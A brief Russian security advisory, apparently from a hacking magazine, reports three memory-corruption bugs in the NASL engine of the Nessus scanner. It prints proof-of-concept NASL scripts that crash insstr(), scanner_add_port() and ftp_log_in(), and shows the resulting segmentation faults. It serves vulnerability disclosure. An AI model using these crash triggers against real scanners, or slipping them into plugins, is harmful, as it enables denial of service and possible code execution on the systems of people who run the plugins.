Хакер #305. Многошаговые SQL-инъекции
Nessus -
бесплатный мощный сканер безопасности. Его
модульная архитектура позволяет легко и
просто настраивать его под определенные
нужды. В скриптовом движке NASL сканера
обнаружено несколько уязвимостей. Для их
использования необходимо иметь права на
установку плагинов в сканере либо
заставить кого-либо с такими правами
выполнить вредоносный nasl скрипт
Первая уязвимость найдена в функции insstr().
$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)
Вторая - в scanner_add_port(), при использовании
длинного аргумента proto:
$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
Третья - переполнение буфера в ftp_log_in().
$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));
$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)